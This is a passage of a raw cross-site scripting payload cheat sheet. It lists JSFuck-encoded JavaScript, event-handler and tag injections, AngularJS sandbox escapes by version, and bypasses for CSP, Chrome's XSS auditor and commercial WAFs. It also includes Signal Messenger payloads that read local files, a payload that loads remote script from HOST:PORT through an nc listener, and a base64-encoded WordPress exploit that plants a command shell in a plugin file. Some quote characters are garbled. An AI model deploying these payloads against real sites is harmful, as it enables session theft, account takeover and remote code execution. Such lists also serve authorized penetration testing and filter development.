605(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[]
606
607
608
609"><"<img src="x">%20%20>"<iframe src=evil.source>%20<iframe>
610
611
612"><iframe src=a onload=alert("PENTEST") <
613
614" src="><svg/onload=prompt(2)> ""input onfocus=alert(2)" autofocus>
615
616" onfocus="alert(1)" autofocus
617
618t" onmouseover=alert(/xss/); a="
619
620%22onmouseover%3d%22alert(document.domain)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22uo545
621
622"><img src=x onerror=alert(/PTEST/)</script>
623 "><img src=x onerror=prompt(23);>
624
625<h>xxs link<a><img src="c" onerror=alert(1)>
626
627<img src=x onerror=alert('h')><xmp>
628
629<a onmouseover=alert(document.cookie)>xxs link</a>
630<a onmouseover=alert(document.cookie)>%20<h>xxs link<a><iframe src="c" onload=alert(1)>
631
632<div onactivate=alert('XSSTEST') id=xss style=overflow:scroll>
633
634Ij48IjxpbWcgc3JjPSJ4Ij4lMjAlMjA+IjxpZnJhbWUgc3JjPWE+JTIwPGlmcmFtZT4=
635
636
637
638
639String Char Eval
640 {{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
641
642 'a'.constructor.prototype['char\u0041t']
643
644 'a'.constructor.prototype['char\u0041t']=''.concat;
645
646{{'a'.constructor.prototype['char\u0041t']=''.concat;
647$eval("x='\"+(y='if(!window\\u002?x)alert(window\\u002ex=1)')+eval(y)+\"'");}}
648
649
650{{
651 ({}.toString()).constructor.prototype.charAt=[].join;
652 $eval(({}.toString()).constructor.fromCharCode(120,61,49,125,32,125,32,125,59,97,108,101,114,116,40,49,41,47,47))
653}}
654
655
656
657{{
658 x=toString();x.constructor.prototype.charAt=x.constructor.prototype.concat;
659 $eval(x.constructor.fromCharCode(120,61,49,125,32,125,32,125,59,97,108,101,114,116,40,49,41,47,47))
660}}
661
662
663
664t=o.anchor(true);//<a name="true">[object Undefined]</a>
665
666
667
668{{
669c=[];
670o=toString();
671t=o.anchor(true);
672f=o.anchor(false);
673c.push(o[5]);
674c.push(o[1]);
675c.push(t[3]);
676c.push(f[12]);
677c.push(t[9]);
678c.push(t[10]);
679c.push(t[11]);
680c.push(o[5]);
681c.push(t[9]);
682c.push(o[1]);
683c.push(t[10]);
684a=c.join([]);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[c.join([])].fromCharCode(97,108,101,114,116,40,49,41))()
685}}
686
687
688
689
690HTML Context
691Tag Injection <svg onload=alert(1)>
692ì><svg onload=alert(1)//
693
694
695HTML Context
696Inline Injection ìonmouseover=alert(1)//
697ìautofocus/onfocus=alert(1)//
698
699
700Javascript Context
701Code Injection ë-alert(1)-ë
702ë-alert(1)//
703
704
705Javascript Context
706Code Injection
707(escaping the escape) \í-alert(1)//
708
709
710Javascript Context
711Tag Injection
712</script><svg onload=alert(1)>
713
714
715PHP_SELF Injection
716http://DOMAIN/PAGE.php/î><svg onload=alert(1)>
717
718
719Without Parenthesis
720<svg onload=alert`1`>
721<svg onload=alert(1)>
722<svg onload=alert(1)>
723<svg onload=alert(1)>
724
725
726Filter Bypass
727Alert Obfuscation
728(alert)(1)
729a=alert,a(1)
730[1].find(alert)
731top[ìalî+îertî](1)
732top[/al/.source+/ert/.source](1)
733al\u0065rt(1)
734top[ëal\145rtí](1)
735top[ëal\x65rtí](1)
736top[8680439..toString(30)](1)
737
738
739Body Tag
740<body onload=alert(1)>
741<body onpageshow=alert(1)>
742<body onfocus=alert(1)>
743<body onhashchange=alert(1)><a href=#x>click this!#x
744<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
745<body onscroll=alert(1)><br><br><br><br>
746<br><br><br><br><br><br><br><br><br><br>
747<br><br><br><br><br><br><br><br><br><br>
748<br><br><br><br><br><br><x id=x>#x
749<body onresize=alert(1)>press F12!
750<body onhelp=alert(1)>press F1! (MSIE)
751
752
753Miscellaneous Vectors
754<marquee onstart=alert(1)>
755<marquee loop=1 width=0 onfinish=alert(1)>
756<audio src onloadstart=alert(1)>
757<video onloadstart=alert(1)><source>
758<input autofocus onblur=alert(1)>
759<keygen autofocus onfocus=alert(1)>
760<form onsubmit=alert(1)><input type=submit>
761<select onchange=alert(1)><option>1<option>2
762<menu id=x contextmenu=x onshow=alert(1)>right click me!
763
764
765Agnostic Event Handlers
766<x contenteditable onblur=alert(1)>lose focus!
767<x onclick=alert(1)>click this!
768<x oncopy=alert(1)>copy this!
769<x oncontextmenu=alert(1)>right click this!
770<x oncut=alert(1)>copy this!
771<x ondblclick=alert(1)>double click this!
772<x ondrag=alert(1)>drag this!
773<x contenteditable onfocus=alert(1)>focus this!
774<x contenteditable oninput=alert(1)>input here!
775<x contenteditable onkeydown=alert(1)>press any key!
776<x contenteditable onkeypress=alert(1)>press any key!
777<x contenteditable onkeyup=alert(1)>press any key!
778<x onmousedown=alert(1)>click this!
779<x onmousemove=alert(1)>hover this!
780<x onmouseout=alert(1)>hover this!
781<x onmouseover=alert(1)>hover this!
782<x onmouseup=alert(1)>click this!
783<x contenteditable onpaste=alert(1)>paste here!
784
785
786Code Reuse
787Inline Script <script>alert(1)//
788<script>alert(1)<!ñ
789
790
791Code Reuse
792Regular Script <script src=//localhost:8080/1.js>
793<script src=//3334957647/1>
794
795
796Filter Bypass
797Generic Tag + Handler
798Encoding Mixed Case Spacers
799%3Cx onxxx=1
800<%78 onxxx=1
801<x %6Fnxxx=1
802<x o%6Exxx=1
803<x on%78xx=1
804<x onxxx%3D1 <X onxxx=1
805<x OnXxx=1
806<X OnXxx=1Doubling
807<x onxxx=1 onxxx=1 <x/onxxx=1
808<x%09onxxx=1
809<x%0Aonxxx=1
810<x%0Conxxx=1
811<x%0Donxxx=1
812<x%2Fonxxx=1
813Quotes Stripping Mimetism
814<x 1=í1íonxxx=1
815<x 1=î1?onxxx=1 <[S]x onx[S]xx=1
816
817
818[S] = stripped char or string
819<x </onxxx=1
820<x 1=î>î onxxx=1
821<http://onxxx%3D1/
822
823Generic Source Breaking
824<x onxxx=alert(1) 1=í
825
826
827Browser Control
828<svg onload=setInterval(function(){with(document)body.
829appendChild(createElement(ëscriptí)).src=í//HOST:PORTí},0)>$ while :; do printf ìj$ ì; read c; echo $c | nc -lp PORT >/dev/null; done
830
831
832Multi Reflection Double Reflection
833Single Input Single Input (script-based)
834ëonload=alert(1)><svg/1=í ë>alert(1)</script><script/1=í
835*/alert(1)</script><script>/*
836
837Triple Reflection
838Single Input Single Input (script-based)
839*/alert(1)î>íonload=î/*<svg/1=í
840`-alert(1)î>íonload=î`<svg/1=í */</script>í>alert(1)/*<script/1=í
841
842
843Multi Input Double Input Triple Input
844p=<svg/1=í&q=íonload=alert(1)>
845p=<svg 1=í&q=íonload=í/*&r=*/alert(1)í>
846
847
848Without Event Handlers
849<script>alert(1)</script>
850<script src=javascript:alert(1)>
851<iframe src=javascript:alert(1)>
852<embed src=javascript:alert(1)>
853<a href=javascript:alert(1)>click
854<math><brute href=javascript:alert(1)>click
855<form action=javascript:alert(1)><input type=submit>
856<isindex action=javascript:alert(1) type=submit value=click>
857<form><button formaction=javascript:alert(1)>click
858<form><input formaction=javascript:alert(1) type=submit value=click>
859<form><input formaction=javascript:alert(1) type=image value=click>
860<form><input formaction=javascript:alert(1) type=image src=SOURCE>
861<isindex formaction=javascript:alert(1) type=submit value=click>
862<object data=javascript:alert(1)>
863<iframe srcdoc=<svg/onload=alert(1)>>
864<svg><script xlink:href=data:,alert(1) />
865<math><brute xlink:href=javascript:alert(1)>click
866<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
867
868
869Mobile Only
870Event Handlers
871<html ontouchstart=alert(1)>
872<html ontouchend=alert(1)>
873<html ontouchmove=alert(1)>
874<html ontouchcancel=alert(1)>
875<body onorientationchange=alert(1)>
876
877
878Javascript Properties Functions
879<svg onload=alert(navigator.connection.type)>
880<svg onload=alert(navigator.battery.level)>
881<svg onload=alert(navigator.battery.dischargingTime)>
882<svg onload=alert(navigator.battery.charging)> <svg onload=navigator.vibrate(500)>
883<svg onload=navigator.vibrate([500,300,100])>
884
885
886Generic Self to Regular XSS
887<iframe src=LOGOUT_URL onload=forms[0].submit()>
888</iframe><form method=post action=LOGIN_URL>
889<input name=USERNAME_PARAMETER_NAME value=USERNAME>
890<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>
891
892
893File Upload Injection in Filename
894ì><img src=1 onerror=alert(1)>.gifInjection in Metadata
895$ exiftool -Artist='î><img src=1 onerror=alert(1)>í FILENAME.jpegInjection with SVG File
896<svg xmlns=îhttp://www.w3.org/2000/svgî onload=îalert(document.domain)î/>
897
898
899Injection with GIF File as Source of Script (CSP Bypass)
900GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
901
902Google Chrome
903Auditor Bypass
904<script src=îdata:,alert(1)//
905ì><script src=data:,alert(1)//<script src=î//localhost:8080/1.js#
906ì><script src=//localhost:8080/1.js#<link rel=import href=îdata:text/html,<script>alert(1)</script>
907ì><link rel=import href=data:text/html,<script>alert(1)</script>
908<svg><animate xlink:href=#x attributeName=href values=javascript:alert(1) /><a id=x><rect width=100 height=100 /></a>
909
910Chrome < v60 beta XSS-Auditor Bypass
911
912<script src="data:,alert(1)%250A-->
913
914Other Chrome XSS-Auditor Bypasses
915
916<script>alert(1)</script
917
918<script>alert(1)%0d%0a-->%09</script
919
920<x>%00%00%00%00%00%00%00<script>alert(1)</script>
921
922Safari XSS Vector
923
924<script>location.href;'javascript:alert%281%29'</script>
925
926XSS Polyglot
927
928jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
929
930PHP File for XHR Remote Call
931<?php header(ìAccess-Control-Allow-Origin: *î); ?>
932<img src=1 onerror=alert(1)>
933Server Log Avoidance <svg onload=eval(URL.slice(-8))>#alert(1)
934<svg onload=eval(location.hash.slice(1)>#alert(1)
935<svg onload=innerHTML=location.hash>#<script>alert(1)</script>
936
937<svg/onload=javascript:void(0)?void(0):void(0)?void(0):void(0)?void(0):void(0)?void(0):confirm(location)>
938
939
940Shortest PoC
941<base href=//0>
942
943
944$ while:; do echo ìalert(1)î | nc -lp80; done
945Portable WordPress RCE <script/src=îdata:,eval(atob(location.hash.slice(1)))//#
946#eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd
947Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w
948aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n
949X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC
9505yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV
951RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE
9529TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl
953wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD
954Qp4LnNlbmQoJCk=http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD
955
956
957Invisble JS Alert
958([,?,,,,??]=[]+{},[???,??,????,???,,?????,????,??????,,,?????]=[!!?]+!?+?.?)
959[??+=?+?????+??????+???+??+????+??+???+?+??][??]
960(?????+????+???+??+???+'`#JS!`')``
961
962
963Markdown XSS
964
965[a](javascript:confirm(1))
966
967[a](javascript://www.test.com%0Aprompt(1))
968
969[a](javascript://%0d%0aconfirm(1))
970
971[a](javascript://%0d%0aconfirm(1);com)
972
973[a](javascript:window.onerror=confirm;throw%201)
974
975[a]: (javascript:prompt(1))
976
977[a]:(?javascript:alert(1))
978
979
980Angular JS
981'a'.constructor.fromCharCode=[].join;
982'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
983
984{{
985'a'.constructor.prototype.charAt=[].join;
986eval('x=1} } };alert(1)//');
987}}
988
989AngularJS Template Injection based XSS
990
9911.0.1 - 1.1.5
992
993{{constructor.constructor('alert(1)')()}}
994
9951.2.0 - 1.2.1
996
997{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
998
9991.2.2 - 1.2.5
1000
1001{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
1002
10031.2.6 - 1.2.18
1004
1005{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1006
10071.2.19 - 1.2.23
1008
1009{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
1010
10111.2.24 - 1.2.29
1012
1013{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
1014
10151.3.0
1016
1017{{!ready && (ready = true) && (
1018 !call
1019 ? $$watchers[0].get(toString.constructor.prototype)
1020 : (a = apply) &&
1021 (apply = constructor) &&
1022 (valueOf = call) &&
1023 (''+''.toString(
1024 'F = Function.prototype;' +
1025 'F.apply = F.a;' +
1026 'delete F.a;' +
1027 'delete F.valueOf;' +
1028 'alert(1);'
1029 ))
1030 );}}
1031
10321.3.1 - 1.3.2
1033
1034{{
1035 {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
1036 'a'.constructor.prototype.charAt=''.valueOf;
1037 $eval('x=alert(1)//');
1038}}
1039
10401.3.3 - 1.3.18
1041
1042{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
1043
1044 'a'.constructor.prototype.charAt=[].join;
1045 $eval('x=alert(1)//'); }}
1046
10471.3.19
1048
1049{{
1050 'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
1051 $eval('x=alert(1)//');
1052}}
1053
10541.3.20
1055
1056{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1057
10581.4.0 - 1.4.9
1059
1060{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1061
10621.5.0 - 1.5.8
1063
1064{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
1065
10661.5.9 - 1.5.11
1067
1068{{
1069 c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
1070 c.$apply=$apply;c.$eval=b;op=$root.$$phase;
1071 $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
1072 C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
1073 B=C(b,c,b);$evalAsync("
1074 astNode=pop();astNode.type='UnaryExpression';
1075 astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
1076 astNode.argument={type:'Identifier',name:'foo'};
1077 ");
1078 m1=B($$asyncQueue.pop().expression,null,$root);
1079 m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
1080 $eval('a(b.c)');[].push.apply=a;
1081}}
1082
10831.6.0+ (no Expression Sandbox)
1084
1085{{constructor.constructor('alert(1)')()}}
1086
1087Content Security Policy (CSP) bypass via JSONP endpoints
1088
1089Grab the target's CSP:
1090
1091curl -I http://example.com | grep 'Content-Security-Policy'
1092
1093
1094Lightweight Markup Languages
1095
1096RubyDoc (.rdoc)
1097
1098XSS[JavaScript:alert(1)]
1099
1100Textile (.textile)
1101
1102"Test link":javascript:alert(1)
1103
1104reStructuredText (.rst)
1105
1106`Test link`__.
1107
1108__ javascript:alert(document.domain)
1109
1110Unicode characters
1111
1112Üáï<img src=a onerror=javascript:alert('test')>ÖâÄ
1113
1114
1115
1116Sanbox Bypasses
1117{{constructor.constructor('alert(1)')()}}
1118
1119{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
1120
1121{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
1122
1123{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1124
1125{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
1126
1127{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
1128
1129{{!ready && (ready = true) && (
1130 !call
1131 ? $$watchers[0].get(toString.constructor.prototype)
1132 : (a = apply) &&
1133 (apply = constructor) &&
1134 (valueOf = call) &&
1135 (''+''.toString(
1136 'F = Function.prototype;' +
1137 'F.apply = F.a;' +
1138 'delete F.a;' +
1139 'delete F.valueOf;' +
1140 'alert(1);'
1141 ))
1142 );}}
1143
1144{{
1145 {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
1146 'a'.constructor.prototype.charAt=''.valueOf;
1147 $eval('x=alert(1)//');
1148}}
1149
1150{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
1151 'a'.constructor.prototype.charAt=[].join;
1152 $eval('x=alert(1)//'); }}
1153
1154{{
1155 'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
1156 $eval('x=alert(1)//');
1157}}
1158
1159{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1160
1161{{
1162 c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
1163 c.$apply=$apply;c.$eval=b;op=$root.$$phase;
1164 $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
1165 C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
1166 B=C(b,c,b);$evalAsync("
1167 astNode=pop();astNode.type='UnaryExpression';
1168 astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
1169 astNode.argument={type:'Identifier',name:'foo'};
1170 ");
1171 m1=B($$asyncQueue.pop().expression,null,$root);
1172 m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
1173 $eval('a(b.c)');[].push.apply=a;
1174}}
1175
1176{{constructor.constructor('alert(1)')()}}
1177
1178
1179Kona WAF (Akamai) Bypass
1180
1181\');confirm(1);//
1182
1183ModSecurity WAF Bypass Note: This kind of depends on what security level the application is set to. See: https://modsecurity.org/rules.html
1184
1185<img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>
1186
1187Wordfence XSS Bypasses
1188
1189<meter onmouseover="alert(1)"
1190
1191'">><div><meter onmouseover="alert(1)"</div>"
1192
1193>><marquee loop=1 width=0 onfinish=alert(1)>
1194
1195Incapsula WAF Bypasses
1196
1197<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
1198
1199<img/src=q onerror='new Function`al\ert\`1\``'>
1200
1201jQuery < 3.0.0 XSS
1202
1203$.get('http://sakurity.com/jqueryxss')
1204
1205In order to really exploit this jQuery XSS you will need to fulfil one of the following requirements:
1206
1207 Find any cross domain requests to untrusted domains which may inadvertently execute script.
1208 Find any requests to trusted API endpoints where script can be injected into data sources.
1209
1210URL verification bypasses (works without 	 too)
1211
1212javas	cript://www.google.com/%0Aalert(1)
1213
1214
1215
1216
1217
1218
1219Signal Messenger Payloads
1220http://testdomain/?p=%3Ciframe%20src="/etc/passwd"%3E%3C/iframe%3E%20PENTEST
1221
1222http://testdomain/?p=%3d%3Ciframe%20src=\\DESKTOP-[LOCALPATH]\Temp\rce.html%3E
1223
1224http://testdomain/?p=%3d%3Ciframe%20src=\\xxx.xxx.xxx.xxx\Temp\rce.html%3E
1225
1226http://testdomain/?p=%3Ciframe%20src="testfile.html"%3E%3C/iframe%3E%20PENTEST
1227
1228http://testdomain/?p=%3Ciframe%20srcdoc="<p>PENTEST</p>"%3E%3C/iframe%3E
1229
1230http://testdomain/?p=%3Caudio%20autoplay%20src="/usr/share/sounds/gnome/default/alerts/bark.ogg"%20type="audio/ogg"%3E%3C/audio%3E
1231
1232http://testdomain/?p=%3Cvideo%20autoplay%20loop%20src="/usr/share/help/C/gnome-help/figures/display-dual-monitors.webm"%20type="video/webm"%3E%3C/video%3E
1233
1234http://testdomain/?p=%3Cform%20method='POST'%20action='https://domain.de/url'%3E%3Cinput%20type='text'%20name='data'%20value='from_form'/%3E%3Cinput%20type='submit'/%3E%3C/form%3E
1235
1236
1237
1238
1239Waf Engine Bypass
1240<svg onload\r\n=$.globalEval("al"+"ert()");>
1241<img onload\r\n=$.globalEval("al"+"ert()");>
1242<iframe src="\\" onload\r\n=$.globalEval("al"+"ert()");>